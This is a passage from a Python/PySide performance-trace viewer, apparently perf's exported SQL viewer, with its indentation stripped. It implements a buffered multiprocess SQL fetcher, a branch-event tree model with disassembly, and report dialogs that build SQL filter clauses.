while True:
self.wait_event.clear()
target = self.process_target.value
if target > self.fetched or target < 0:
break
self.wait_event.wait()
return target
def HasSpace(self, sz):
if self.local_tail <= self.local_head:
space = len(self.buffer) - self.local_head
if space > sz:
return True
if space >= glb_nsz:
# Use 0 (or space < glb_nsz) to mean there is no more at the top of the buffer
nd = pickle.dumps(0, pickle.HIGHEST_PROTOCOL)
self.buffer[self.local_head : self.local_head + len(nd)] = nd
self.local_head = 0
if self.local_tail - self.local_head > sz:
return True
return False
def WaitForSpace(self, sz):
if self.HasSpace(sz):
return
while True:
self.wait_event.clear()
self.local_tail = self.tail.value
if self.HasSpace(sz):
return
self.wait_event.wait()
def AddToBuffer(self, obj):
d = pickle.dumps(obj, pickle.HIGHEST_PROTOCOL)
n = len(d)
nd = pickle.dumps(n, pickle.HIGHEST_PROTOCOL)
sz = n + glb_nsz
self.WaitForSpace(sz)
pos = self.local_head
self.buffer[pos : pos + len(nd)] = nd
self.buffer[pos + glb_nsz : pos + sz] = d
self.local_head += sz
def FetchBatch(self, batch_size):
fetched = 0
while batch_size > fetched:
obj = self.Next()
if obj is None:
self.more = False
break
self.AddToBuffer(obj)
fetched += 1
if fetched:
self.fetched += fetched
with self.fetch_count.get_lock():
self.fetch_count.value += fetched
self.head.value = self.local_head
self.fetched_event.set()
def Run(self):
while self.more:
target = self.WaitForTarget()
if target < 0:
break
batch_size = min(glb_chunk_sz, target - self.fetched)
self.FetchBatch(batch_size)
self.fetching_done.value = True
self.fetched_event.set()
def SQLFetcherFn(*x):
process = SQLFetcherProcess(*x)
process.Run()
# SQL data fetcher
class SQLFetcher(QObject):
done = Signal(object)
def __init__(self, glb, sql, prep, process_data, parent=None):
super(SQLFetcher, self).__init__(parent)
self.process_data = process_data
self.more = True
self.target = 0
self.last_target = 0
self.fetched = 0
self.buffer_size = 16 * 1024 * 1024
self.buffer = Array(c_char, self.buffer_size, lock=False)
self.head = Value(c_longlong)
self.tail = Value(c_longlong)
self.local_tail = 0
self.fetch_count = Value(c_longlong)
self.fetching_done = Value(c_bool)
self.last_count = 0
self.process_target = Value(c_longlong)
self.wait_event = Event()
self.fetched_event = Event()
glb.AddInstanceToShutdownOnExit(self)
self.process = Process(target=SQLFetcherFn, args=(glb.dbref, sql, self.buffer, self.head, self.tail, self.fetch_count, self.fetching_done, self.process_target, self.wait_event, self.fetched_event, prep))
self.process.start()
self.thread = Thread(self.Thread)
self.thread.done.connect(self.ProcessData, Qt.QueuedConnection)
self.thread.start()
def Shutdown(self):
# Tell the thread and process to exit
self.process_target.value = -1
self.wait_event.set()
self.more = False
self.fetching_done.value = True
self.fetched_event.set()
def Thread(self):
if not self.more:
return True, 0
while True:
self.fetched_event.clear()
fetch_count = self.fetch_count.value
if fetch_count != self.last_count:
break
if self.fetching_done.value:
self.more = False
return True, 0
self.fetched_event.wait()
count = fetch_count - self.last_count
self.last_count = fetch_count
self.fetched += count
return False, count
def Fetch(self, nr):
if not self.more:
# -1 inidcates there are no more
return -1
result = self.fetched
extra = result + nr - self.target
if extra > 0:
self.target += extra
# process_target < 0 indicates shutting down
if self.process_target.value >= 0:
self.process_target.value = self.target
self.wait_event.set()
return result
def RemoveFromBuffer(self):
pos = self.local_tail
if len(self.buffer) - pos < glb_nsz:
pos = 0
n = pickle.loads(self.buffer[pos : pos + glb_nsz])
if n == 0:
pos = 0
n = pickle.loads(self.buffer[0 : glb_nsz])
pos += glb_nsz
obj = pickle.loads(self.buffer[pos : pos + n])
self.local_tail = pos + n
return obj
def ProcessData(self, count):
for i in xrange(count):
obj = self.RemoveFromBuffer()
self.process_data(obj)
self.tail.value = self.local_tail
self.wait_event.set()
self.done.emit(count)
# Fetch more records bar
class FetchMoreRecordsBar():
def __init__(self, model, parent):
self.model = model
self.label = QLabel("Number of records (x " + "{:,}".format(glb_chunk_sz) + ") to fetch:")
self.label.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.fetch_count = QSpinBox()
self.fetch_count.setRange(1, 1000000)
self.fetch_count.setValue(10)
self.fetch_count.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.fetch = QPushButton("Go!")
self.fetch.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.fetch.released.connect(self.FetchMoreRecords)
self.progress = QProgressBar()
self.progress.setRange(0, 100)
self.progress.hide()
self.done_label = QLabel("All records fetched")
self.done_label.hide()
self.spacer = QLabel("")
self.close_button = QToolButton()
self.close_button.setIcon(parent.style().standardIcon(QStyle.SP_DockWidgetCloseButton))
self.close_button.released.connect(self.Deactivate)
self.hbox = QHBoxLayout()
self.hbox.setContentsMargins(0, 0, 0, 0)
self.hbox.addWidget(self.label)
self.hbox.addWidget(self.fetch_count)
self.hbox.addWidget(self.fetch)
self.hbox.addWidget(self.spacer)
self.hbox.addWidget(self.progress)
self.hbox.addWidget(self.done_label)
self.hbox.addWidget(self.close_button)
self.bar = QWidget()
self.bar.setLayout(self.hbox)
self.bar.show()
self.in_progress = False
self.model.progress.connect(self.Progress)
self.done = False
if not model.HasMoreRecords():
self.Done()
def Widget(self):
return self.bar
def Activate(self):
self.bar.show()
self.fetch.setFocus()
def Deactivate(self):
self.bar.hide()
def Enable(self, enable):
self.fetch.setEnabled(enable)
self.fetch_count.setEnabled(enable)
def Busy(self):
self.Enable(False)
self.fetch.hide()
self.spacer.hide()
self.progress.show()
def Idle(self):
self.in_progress = False
self.Enable(True)
self.progress.hide()
self.fetch.show()
self.spacer.show()
def Target(self):
return self.fetch_count.value() * glb_chunk_sz
def Done(self):
self.done = True
self.Idle()
self.label.hide()
self.fetch_count.hide()
self.fetch.hide()
self.spacer.hide()
self.done_label.show()
def Progress(self, count):
if self.in_progress:
if count:
percent = ((count - self.start) * 100) / self.Target()
if percent >= 100:
self.Idle()
else:
self.progress.setValue(percent)
if not count:
# Count value of zero means no more records
self.Done()
def FetchMoreRecords(self):
if self.done:
return
self.progress.setValue(0)
self.Busy()
self.in_progress = True
self.start = self.model.FetchMoreRecords(self.Target())
# Brance data model level two item
class BranchLevelTwoItem():
def __init__(self, row, col, text, parent_item):
self.row = row
self.parent_item = parent_item
self.data = [""] * (col + 1)
self.data[col] = text
self.level = 2
def getParentItem(self):
return self.parent_item
def getRow(self):
return self.row
def childCount(self):
return 0
def hasChildren(self):
return False
def getData(self, column):
return self.data[column]
# Brance data model level one item
class BranchLevelOneItem():
def __init__(self, glb, row, data, parent_item):
self.glb = glb
self.row = row
self.parent_item = parent_item
self.child_count = 0
self.child_items = []
self.data = data[1:]
self.dbid = data[0]
self.level = 1
self.query_done = False
self.br_col = len(self.data) - 1
def getChildItem(self, row):
return self.child_items[row]
def getParentItem(self):
return self.parent_item
def getRow(self):
return self.row
def Select(self):
self.query_done = True
if not self.glb.have_disassembler:
return
query = QSqlQuery(self.glb.db)
QueryExec(query, "SELECT cpu, to_dso_id, to_symbol_id, to_sym_offset, short_name, long_name, build_id, sym_start, to_ip"
" FROM samples"
" INNER JOIN dsos ON samples.to_dso_id = dsos.id"
" INNER JOIN symbols ON samples.to_symbol_id = symbols.id"
" WHERE samples.id = " + str(self.dbid))
if not query.next():
return
cpu = query.value(0)
dso = query.value(1)
sym = query.value(2)
if dso == 0 or sym == 0:
return
off = query.value(3)
short_name = query.value(4)
long_name = query.value(5)
build_id = query.value(6)
sym_start = query.value(7)
ip = query.value(8)
QueryExec(query, "SELECT samples.dso_id, symbol_id, sym_offset, sym_start"
" FROM samples"
" INNER JOIN symbols ON samples.symbol_id = symbols.id"
" WHERE samples.id > " + str(self.dbid) + " AND cpu = " + str(cpu) +
" ORDER BY samples.id"
" LIMIT 1")
if not query.next():
return
if query.value(0) != dso:
# Cannot disassemble from one dso to another
return
bsym = query.value(1)
boff = query.value(2)
bsym_start = query.value(3)
if bsym == 0:
return
tot = bsym_start + boff + 1 - sym_start - off
if tot <= 0 or tot > 16384:
return
inst = self.glb.disassembler.Instruction()
f = self.glb.FileFromNamesAndBuildId(short_name, long_name, build_id)
if not f:
return
mode = 0 if Is64Bit(f) else 1
self.glb.disassembler.SetMode(inst, mode)
buf_sz = tot + 16
buf = create_string_buffer(tot + 16)
f.seek(sym_start + off)
buf.value = f.read(buf_sz)
buf_ptr = addressof(buf)
i = 0
while tot > 0:
cnt, text = self.glb.disassembler.DisassembleOne(inst, buf_ptr, buf_sz, ip)
if cnt:
byte_str = tohex(ip).rjust(16)
for k in xrange(cnt):
byte_str += " %02x" % ord(buf[i])
i += 1
while k < 15:
byte_str += " "
k += 1
self.child_items.append(BranchLevelTwoItem(0, self.br_col, byte_str + " " + text, self))
self.child_count += 1
else:
return
buf_ptr += cnt
tot -= cnt
buf_sz -= cnt
ip += cnt
def childCount(self):
if not self.query_done:
self.Select()
if not self.child_count:
return -1
return self.child_count
def hasChildren(self):
if not self.query_done:
return True
return self.child_count > 0
def getData(self, column):
return self.data[column]
# Brance data model root item
class BranchRootItem():
def __init__(self):
self.child_count = 0
self.child_items = []
self.level = 0
def getChildItem(self, row):
return self.child_items[row]
def getParentItem(self):
return None
def getRow(self):
return 0
def childCount(self):
return self.child_count
def hasChildren(self):
return self.child_count > 0
def getData(self, column):
return ""
# Calculate instructions per cycle
def CalcIPC(cyc_cnt, insn_cnt):
if cyc_cnt and insn_cnt:
ipc = Decimal(float(insn_cnt) / cyc_cnt)
ipc = str(ipc.quantize(Decimal(".01"), rounding=ROUND_HALF_UP))
else:
ipc = "0"
return ipc
# Branch data preparation
def BranchDataPrepBr(query, data):
data.append(tohex(query.value(8)).rjust(16) + " " + query.value(9) + offstr(query.value(10)) +
" (" + dsoname(query.value(11)) + ")" + " -> " +
tohex(query.value(12)) + " " + query.value(13) + offstr(query.value(14)) +
" (" + dsoname(query.value(15)) + ")")
def BranchDataPrepIPC(query, data):
insn_cnt = query.value(16)
cyc_cnt = query.value(17)
ipc = CalcIPC(cyc_cnt, insn_cnt)
data.append(insn_cnt)
data.append(cyc_cnt)
data.append(ipc)
def BranchDataPrep(query):
data = []
for i in xrange(0, 8):
data.append(query.value(i))
BranchDataPrepBr(query, data)
return data
def BranchDataPrepWA(query):
data = []
data.append(query.value(0))
# Workaround pyside failing to handle large integers (i.e. time) in python3 by converting to a string
data.append("{:>19}".format(query.value(1)))
for i in xrange(2, 8):
data.append(query.value(i))
BranchDataPrepBr(query, data)
return data
def BranchDataWithIPCPrep(query):
data = []
for i in xrange(0, 8):
data.append(query.value(i))
BranchDataPrepIPC(query, data)
BranchDataPrepBr(query, data)
return data
def BranchDataWithIPCPrepWA(query):
data = []
data.append(query.value(0))
# Workaround pyside failing to handle large integers (i.e. time) in python3 by converting to a string
data.append("{:>19}".format(query.value(1)))
for i in xrange(2, 8):
data.append(query.value(i))
BranchDataPrepIPC(query, data)
BranchDataPrepBr(query, data)
return data
# Branch data model
class BranchModel(TreeModel):
progress = Signal(object)
def __init__(self, glb, event_id, where_clause, parent=None):
super(BranchModel, self).__init__(glb, None, parent)
self.event_id = event_id
self.more = True
self.populated = 0
self.have_ipc = IsSelectable(glb.db, "samples", columns = "insn_count, cyc_count")
if self.have_ipc:
select_ipc = ", insn_count, cyc_count"
prep_fn = BranchDataWithIPCPrep
prep_wa_fn = BranchDataWithIPCPrepWA
else:
select_ipc = ""
prep_fn = BranchDataPrep
prep_wa_fn = BranchDataPrepWA
sql = ("SELECT samples.id, time, cpu, comm, pid, tid, branch_types.name,"
" CASE WHEN in_tx = '0' THEN 'No' ELSE 'Yes' END,"
" ip, symbols.name, sym_offset, dsos.short_name,"
" to_ip, to_symbols.name, to_sym_offset, to_dsos.short_name"
+ select_ipc +
" FROM samples"
" INNER JOIN comms ON comm_id = comms.id"
" INNER JOIN threads ON thread_id = threads.id"
" INNER JOIN branch_types ON branch_type = branch_types.id"
" INNER JOIN symbols ON symbol_id = symbols.id"
" INNER JOIN symbols to_symbols ON to_symbol_id = to_symbols.id"
" INNER JOIN dsos ON samples.dso_id = dsos.id"
" INNER JOIN dsos AS to_dsos ON samples.to_dso_id = to_dsos.id"
" WHERE samples.id > $$last_id$$" + where_clause +
" AND evsel_id = " + str(self.event_id) +
" ORDER BY samples.id"
" LIMIT " + str(glb_chunk_sz))
if pyside_version_1 and sys.version_info[0] == 3:
prep = prep_fn
else:
prep = prep_wa_fn
self.fetcher = SQLFetcher(glb, sql, prep, self.AddSample)
self.fetcher.done.connect(self.Update)
self.fetcher.Fetch(glb_chunk_sz)
def GetRoot(self):
return BranchRootItem()
def columnCount(self, parent=None):
if self.have_ipc:
return 11
else:
return 8
def columnHeader(self, column):
if self.have_ipc:
return ("Time", "CPU", "Command", "PID", "TID", "Branch Type", "In Tx", "Insn Cnt", "Cyc Cnt", "IPC", "Branch")[column]
else:
return ("Time", "CPU", "Command", "PID", "TID", "Branch Type", "In Tx", "Branch")[column]
def columnFont(self, column):
if self.have_ipc:
br_col = 10
else:
br_col = 7
if column != br_col:
return None
return QFont("Monospace")
def DisplayData(self, item, index):
if item.level == 1:
self.FetchIfNeeded(item.row)
return item.getData(index.column())
def AddSample(self, data):
child = BranchLevelOneItem(self.glb, self.populated, data, self.root)
self.root.child_items.append(child)
self.populated += 1
def Update(self, fetched):
if not fetched:
self.more = False
self.progress.emit(0)
child_count = self.root.child_count
count = self.populated - child_count
if count > 0:
parent = QModelIndex()
self.beginInsertRows(parent, child_count, child_count + count - 1)
self.insertRows(child_count, count, parent)
self.root.child_count += count
self.endInsertRows()
self.progress.emit(self.root.child_count)
def FetchMoreRecords(self, count):
current = self.root.child_count
if self.more:
self.fetcher.Fetch(count)
else:
self.progress.emit(0)
return current
def HasMoreRecords(self):
return self.more
# Report Variables
class ReportVars():
def __init__(self, name = "", where_clause = "", limit = ""):
self.name = name
self.where_clause = where_clause
self.limit = limit
def UniqueId(self):
return str(self.where_clause + ";" + self.limit)
# Branch window
class BranchWindow(QMdiSubWindow):
def __init__(self, glb, event_id, report_vars, parent=None):
super(BranchWindow, self).__init__(parent)
model_name = "Branch Events " + str(event_id) + " " + report_vars.UniqueId()
self.model = LookupCreateModel(model_name, lambda: BranchModel(glb, event_id, report_vars.where_clause))
self.view = QTreeView()
self.view.setUniformRowHeights(True)
self.view.setSelectionMode(QAbstractItemView.ContiguousSelection)
self.view.CopyCellsToClipboard = CopyTreeCellsToClipboard
self.view.setModel(self.model)
self.ResizeColumnsToContents()
self.context_menu = TreeContextMenu(self.view)
self.find_bar = FindBar(self, self, True)
self.finder = ChildDataItemFinder(self.model.root)
self.fetch_bar = FetchMoreRecordsBar(self.model, self)
self.vbox = VBox(self.view, self.find_bar.Widget(), self.fetch_bar.Widget())
self.setWidget(self.vbox.Widget())
AddSubWindow(glb.mainwindow.mdi_area, self, report_vars.name + " Branch Events")
def ResizeColumnToContents(self, column, n):
# Using the view's resizeColumnToContents() here is extrememly slow
# so implement a crude alternative
mm = "MM" if column else "MMMM"
font = self.view.font()
metrics = QFontMetrics(font)
max = 0
for row in xrange(n):
val = self.model.root.child_items[row].data[column]
len = metrics.width(str(val) + mm)
max = len if len > max else max
val = self.model.columnHeader(column)
len = metrics.width(str(val) + mm)
max = len if len > max else max
self.view.setColumnWidth(column, max)
def ResizeColumnsToContents(self):
n = min(self.model.root.child_count, 100)
if n < 1:
# No data yet, so connect a signal to notify when there is
self.model.rowsInserted.connect(self.UpdateColumnWidths)
return
columns = self.model.columnCount()
for i in xrange(columns):
self.ResizeColumnToContents(i, n)
def UpdateColumnWidths(self, *x):
# This only needs to be done once, so disconnect the signal now
self.model.rowsInserted.disconnect(self.UpdateColumnWidths)
self.ResizeColumnsToContents()
def Find(self, value, direction, pattern, context):
self.view.setFocus()
self.find_bar.Busy()
self.finder.Find(value, direction, pattern, context, self.FindDone)
def FindDone(self, row):
self.find_bar.Idle()
if row >= 0:
self.view.setCurrentIndex(self.model.index(row, 0, QModelIndex()))
else:
self.find_bar.NotFound()
# Line edit data item
class LineEditDataItem(object):
def __init__(self, glb, label, placeholder_text, parent, id = "", default = ""):
self.glb = glb
self.label = label
self.placeholder_text = placeholder_text
self.parent = parent
self.id = id
self.value = default
self.widget = QLineEdit(default)
self.widget.editingFinished.connect(self.Validate)
self.widget.textChanged.connect(self.Invalidate)
self.red = False
self.error = ""
self.validated = True
if placeholder_text:
self.widget.setPlaceholderText(placeholder_text)
def TurnTextRed(self):
if not self.red:
palette = QPalette()
palette.setColor(QPalette.Text,Qt.red)
self.widget.setPalette(palette)
self.red = True
def TurnTextNormal(self):
if self.red:
palette = QPalette()
self.widget.setPalette(palette)
self.red = False
def InvalidValue(self, value):
self.value = ""
self.TurnTextRed()
self.error = self.label + " invalid value '" + value + "'"
self.parent.ShowMessage(self.error)
def Invalidate(self):
self.validated = False
def DoValidate(self, input_string):
self.value = input_string.strip()
def Validate(self):
self.validated = True
self.error = ""
self.TurnTextNormal()
self.parent.ClearMessage()
input_string = self.widget.text()
if not len(input_string.strip()):
self.value = ""
return
self.DoValidate(input_string)
def IsValid(self):
if not self.validated:
self.Validate()
if len(self.error):
self.parent.ShowMessage(self.error)
return False
return True
def IsNumber(self, value):
try:
x = int(value)
except:
x = 0
return str(x) == value
# Non-negative integer ranges dialog data item
class NonNegativeIntegerRangesDataItem(LineEditDataItem):
def __init__(self, glb, label, placeholder_text, column_name, parent):
super(NonNegativeIntegerRangesDataItem, self).__init__(glb, label, placeholder_text, parent)
self.column_name = column_name
def DoValidate(self, input_string):
singles = []
ranges = []
for value in [x.strip() for x in input_string.split(",")]:
if "-" in value:
vrange = value.split("-")
if len(vrange) != 2 or not self.IsNumber(vrange[0]) or not self.IsNumber(vrange[1]):
return self.InvalidValue(value)
ranges.append(vrange)
else:
if not self.IsNumber(value):
return self.InvalidValue(value)
singles.append(value)
ranges = [("(" + self.column_name + " >= " + r[0] + " AND " + self.column_name + " <= " + r[1] + ")") for r in ranges]
if len(singles):
ranges.append(self.column_name + " IN (" + ",".join(singles) + ")")
self.value = " OR ".join(ranges)
# Positive integer dialog data item
class PositiveIntegerDataItem(LineEditDataItem):
def __init__(self, glb, label, placeholder_text, parent, id = "", default = ""):
super(PositiveIntegerDataItem, self).__init__(glb, label, placeholder_text, parent, id, default)
def DoValidate(self, input_string):
if not self.IsNumber(input_string.strip()):
return self.InvalidValue(input_string)
value = int(input_string.strip())
if value <= 0:
return self.InvalidValue(input_string)
self.value = str(value)
# Dialog data item converted and validated using a SQL table
class SQLTableDataItem(LineEditDataItem):
def __init__(self, glb, label, placeholder_text, table_name, match_column, column_name1, column_name2, parent):
super(SQLTableDataItem, self).__init__(glb, label, placeholder_text, parent)
self.table_name = table_name
self.match_column = match_column
self.column_name1 = column_name1
self.column_name2 = column_name2
def ValueToIds(self, value):
ids = []
query = QSqlQuery(self.glb.db)
stmt = "SELECT id FROM " + self.table_name + " WHERE " + self.match_column + " = '" + value + "'"
ret = query.exec_(stmt)
if ret:
while query.next():
ids.append(str(query.value(0)))
return ids
def DoValidate(self, input_string):
all_ids = []
for value in [x.strip() for x in input_string.split(",")]:
ids = self.ValueToIds(value)
if len(ids):
all_ids.extend(ids)
else:
return self.InvalidValue(value)
self.value = self.column_name1 + " IN (" + ",".join(all_ids) + ")"
if self.column_name2:
self.value = "( " + self.value + " OR " + self.column_name2 + " IN (" + ",".join(all_ids) + ") )"
# Sample time ranges dialog data item converted and validated using 'samples' SQL table
class SampleTimeRangesDataItem(LineEditDataItem):
def __init__(self, glb, label, placeholder_text, column_name, parent):
self.column_name = column_name
self.last_id = 0
self.first_time = 0
self.last_time = 2 ** 64
query = QSqlQuery(glb.db)
QueryExec(query, "SELECT id, time FROM samples ORDER BY id DESC LIMIT 1")
if query.next():
self.last_id = int(query.value(0))
self.first_time = int(glb.HostStartTime())
self.last_time = int(glb.HostFinishTime())
if placeholder_text:
placeholder_text += ", between " + str(self.first_time) + " and " + str(self.last_time)
super(SampleTimeRangesDataItem, self).__init__(glb, label, placeholder_text, parent)
def IdBetween(self, query, lower_id, higher_id, order):
QueryExec(query, "SELECT id FROM samples WHERE id > " + str(lower_id) + " AND id < " + str(higher_id) + " ORDER BY id " + order + " LIMIT 1")
if query.next():
return True, int(query.value(0))
else:
return False, 0
def BinarySearchTime(self, lower_id, higher_id, target_time, get_floor):
query = QSqlQuery(self.glb.db)
while True:
next_id = int((lower_id + higher_id) / 2)
QueryExec(query, "SELECT time FROM samples WHERE id = " + str(next_id))
if not query.next():
ok, dbid = self.IdBetween(query, lower_id, next_id, "DESC")
if not ok:
ok, dbid = self.IdBetween(query, next_id, higher_id, "")
if not ok:
return str(higher_id)
next_id = dbid
QueryExec(query, "SELECT time FROM samples WHERE id = " + str(next_id))
next_time = int(query.value(0))
if get_floor:
if target_time > next_time:
lower_id = next_id
else:
higher_id = next_id
if higher_id <= lower_id + 1:
return str(higher_id)
else:
if target_time >= next_time:
lower_id = next_id
else:
higher_id = next_id
if higher_id <= lower_id + 1:
return str(lower_id)
def ConvertRelativeTime(self, val):
mult = 1
suffix = val[-2:]
if suffix == "ms":
mult = 1000000
elif suffix == "us":
mult = 1000
elif suffix == "ns":
mult = 1
else:
return val
val = val[:-2].strip()
if not self.IsNumber(val):
return val
val = int(val) * mult
if val >= 0:
val += self.first_time
else:
val += self.last_time
return str(val)
def ConvertTimeRange(self, vrange):
if vrange[0] == "":
vrange[0] = str(self.first_time)
if vrange[1] == "":
vrange[1] = str(self.last_time)
vrange[0] = self.ConvertRelativeTime(vrange[0])
vrange[1] = self.ConvertRelativeTime(vrange[1])
if not self.IsNumber(vrange[0]) or not self.IsNumber(vrange[1]):
return False
beg_range = max(int(vrange[0]), self.first_time)
end_range = min(int(vrange[1]), self.last_time)
if beg_range > self.last_time or end_range < self.first_time:
return False
vrange[0] = self.BinarySearchTime(0, self.last_id, beg_range, True)
vrange[1] = self.BinarySearchTime(1, self.last_id + 1, end_range, False)
return True
def AddTimeRange(self, value, ranges):
n = value.count("-")
if n == 1:
pass
elif n == 2:
if value.split("-")[1].strip() == "":
n = 1
elif n == 3:
n = 2
else:
return False
pos = findnth(value, "-", n)
vrange = [value[:pos].strip() ,value[pos+1:].strip()]
if self.ConvertTimeRange(vrange):
ranges.append(vrange)
return True
return False
def DoValidate(self, input_string):
ranges = []
for value in [x.strip() for x in input_string.split(",")]:
if not self.AddTimeRange(value, ranges):
return self.InvalidValue(value)
ranges = [("(" + self.column_name + " >= " + r[0] + " AND " + self.column_name + " <= " + r[1] + ")") for r in ranges]
self.value = " OR ".join(ranges)
# Report Dialog Base
class ReportDialogBase(QDialog):
def __init__(self, glb, title, items, partial, parent=None):
super(ReportDialogBase, self).__init__(parent)
self.glb = glb
self.report_vars = ReportVars()
self.setWindowTitle(title)
self.setMinimumWidth(600)
self.data_items = [x(glb, self) for x in items]
self.partial = partial
self.grid = QGridLayout()
for row in xrange(len(self.data_items)):
self.grid.addWidget(QLabel(self.data_items[row].label), row, 0)
self.grid.addWidget(self.data_items[row].widget, row, 1)
self.status = QLabel()
self.ok_button = QPushButton("Ok", self)
self.ok_button.setDefault(True)
self.ok_button.released.connect(self.Ok)
self.ok_button.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.cancel_button = QPushButton("Cancel", self)
self.cancel_button.released.connect(self.reject)
self.cancel_button.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.hbox = QHBoxLayout()
#self.hbox.addStretch()
self.hbox.addWidget(self.status)
self.hbox.addWidget(self.ok_button)
self.hbox.addWidget(self.cancel_button)
self.vbox = QVBoxLayout()
self.vbox.addLayout(self.grid)
self.vbox.addLayout(self.hbox)
self.setLayout(self.vbox)
def Ok(self):
vars = self.report_vars
for d in self.data_items:
if d.id == "REPORTNAME":
vars.name = d.value
if not vars.name:
self.ShowMessage("Report name is required")
return
for d in self.data_items:
if not d.IsValid():
return
for d in self.data_items[1:]:
if d.id == "LIMIT":
vars.limit = d.value
elif len(d.value):
if len(vars.where_clause):
vars.where_clause += " AND "
vars.where_clause += d.value
if len(vars.where_clause):
if self.partial:
vars.where_clause = " AND ( " + vars.where_clause + " ) "
else:
vars.where_clause = " WHERE " + vars.where_clause + " "
self.accept()
def ShowMessage(self, msg):
self.status.setText("<font color=#FF0000>" + msg)
def ClearMessage(self):
self.status.setText("")
# Selected branch report creation dialog
class SelectedBranchDialog(ReportDialogBase):
def __init__(self, glb, parent=None):
title = "Selected Branches"
items = (lambda g, p: LineEditDataItem(g, "Report name:", "Enter a name to appear in the window title bar", p, "REPORTNAME"),
lambda g, p: SampleTimeRangesDataItem(g, "Time ranges:", "Enter time ranges", "samples.id", p),
lambda g, p: NonNegativeIntegerRangesDataItem(g, "CPUs:", "Enter CPUs or ranges e.g. 0,5-6", "cpu", p),
lambda g, p: SQLTableDataItem(g, "Commands:", "Only branches with these commands will be included", "comms", "comm", "comm_id", "", p),
lambda g, p: SQLTableDataItem(g, "PIDs:", "Only branches with these process IDs will be included", "threads", "pid", "thread_id", "", p),
lambda g, p: SQLTableDataItem(g, "TIDs:", "Only branches with these thread IDs will be included", "threads", "tid", "thread_id", "", p),
lambda g, p: SQLTableDataItem(g, "DSOs:", "Only branches with these DSOs will be included", "dsos", "short_name", "samples.dso_id", "to_dso_id", p),
lambda g, p: SQLTableDataItem(g, "Symbols:", "Only branches with these symbols will be included", "symbols", "name", "symbol_id", "to_symbol_id", p),
lambda g, p: LineEditDataItem(g, "Raw SQL clause: ", "Enter a raw SQL WHERE clause", p))
super(SelectedBranchDialog, self).__init__(glb, title, items, True, parent)
# Event list
def GetEventList(db):
events = []
query = QSqlQuery(db)
QueryExec(query, "SELECT name FROM selected_events WHERE id > 0 ORDER BY id")
while query.next():
events.append(query.value(0))
return events
# Is a table selectable
def IsSelectable(db, table, sql = "", columns = "*"):
query = QSqlQuery(db)
try:
QueryExec(query, "SELECT " + columns + " FROM " + table + " " + sql + " LIMIT 1")
except:
return False
return True
# SQL table data model item
class SQLTableItem():
def __init__(self, row, data):
self.row = row
self.data = data
def getData(self, column):
return self.data[column]
# SQL table data model
class SQLTableModel(TableModel):
progress = Signal(object)
def __init__(self, glb, sql, column_headers, parent=None):
super(SQLTableModel, self).__init__(parent)
self.glb = glb
self.more = True
self.populated = 0
self.column_headers = column_headers
self.fetcher = SQLFetcher(glb, sql, lambda x, y=len(column_headers): self.SQLTableDataPrep(x, y), self.AddSample)
self.fetcher.done.connect(self.Update)
self.fetcher.Fetch(glb_chunk_sz)
def DisplayData(self, item, index):
self.FetchIfNeeded(item.row)
return item.getData(index.column())
def AddSample(self, data):
child = SQLTableItem(self.populated, data)
self.child_items.append(child)
self.populated += 1
def Update(self, fetched):
if not fetched:
self.more = False
self.progress.emit(0)
child_count = self.child_count
count = self.populated - child_count
if count > 0:
parent = QModelIndex()
self.beginInsertRows(parent, child_count, child_count + count - 1)
self.insertRows(child_count, count, parent)
self.child_count += count
self.endInsertRows()
self.progress.emit(self.child_count)
def FetchMoreRecords(self, count):
current = self.child_count
if self.more:
self.fetcher.Fetch(count)
else:
self.progress.emit(0)
return current
def HasMoreRecords(self):
return self.more
def columnCount(self, parent=None):
return len(self.column_headers)
def columnHeader(self, column):
return self.column_headers[column]
def SQLTableDataPrep(self, query, count):
data = []
for i in xrange(count):
data.append(query.value(i))
return data
# SQL automatic table data model
class SQLAutoTableModel(SQLTableModel):
def __init__(self, glb, table_name, parent=None):
sql = "SELECT * FROM " + table_name + " WHERE id > $$last_id$$ ORDER BY id LIMIT " + str(glb_chunk_sz)
if table_name == "comm_threads_view":
# For now, comm_threads_view has no id column
sql = "SELECT * FROM " + table_name + " WHERE comm_id > $$last_id$$ ORDER BY comm_id LIMIT " + str(glb_chunk_sz)
column_headers = []
query = QSqlQuery(glb.db)
if glb.dbref.is_sqlite3:
QueryExec(query, "PRAGMA table_info(" + table_name + ")")
while query.next():
column_headers.append(query.value(1))
if table_name == "sqlite_master":
sql = "SELECT * FROM " + table_name
else:
if table_name[:19] == "information_schema.":
sql = "SELECT * FROM " + table_name
select_table_name = table_name[19:]
schema = "information_schema"
else:
select_table_name = table_name
schema = "public"
QueryExec(query, "SELECT column_name FROM information_schema.columns WHERE table_schema = '" + schema + "' and table_name = '" + select_table_name + "'")
while query.next():
column_headers.append(query.value(0))
if pyside_version_1 and sys.version_info[0] == 3:
if table_name == "samples_view":
self.SQLTableDataPrep = self.samples_view_DataPrep
if table_name == "samples":
self.SQLTableDataPrep = self.samples_DataPrep
super(SQLAutoTableModel, self).__init__(glb, sql, column_headers, parent)
def samples_view_DataPrep(self, query, count):
data = []
data.append(query.value(0))
# Workaround pyside failing to handle large integers (i.e. time) in python3 by converting to a string
data.append("{:>19}".format(query.value(1)))
for i in xrange(2, count):
data.append(query.value(i))
return data
def samples_DataPrep(self, query, count):
data = []
for i in xrange(9):
data.append(query.value(i))
# Workaround pyside failing to handle large integers (i.e. time) in python3 by converting to a string
data.append("{:>19}".format(query.value(9)))
for i in xrange(10, count):
data.append(query.value(i))
return data
# Base class for custom ResizeColumnsToContents
class ResizeColumnsToContentsBase(QObject):
def __init__(self, parent=None):
super(ResizeColumnsToContentsBase, self).__init__(parent)
def ResizeColumnToContents(self, column, n):
# Using the view's resizeColumnToContents() here is extrememly slow
# so implement a crude alternative
font = self.view.font()
metrics = QFontMetrics(font)
max = 0
for row in xrange(n):
val = self.data_model.child_items[row].data[column]
len = metrics.width(str(val) + "MM")
max = len if len > max else max
val = self.data_model.columnHeader(column)
len = metrics.width(str(val) + "MM")
max = len if len > max else max
self.view.setColumnWidth(column, max)
def ResizeColumnsToContents(self):
n = min(self.data_model.child_count, 100)
if n < 1:
# No data yet, so connect a signal to notify when there is
self.data_model.rowsInserted.connect(self.UpdateColumnWidths)
return
columns = self.data_model.columnCount()
for i in xrange(columns):
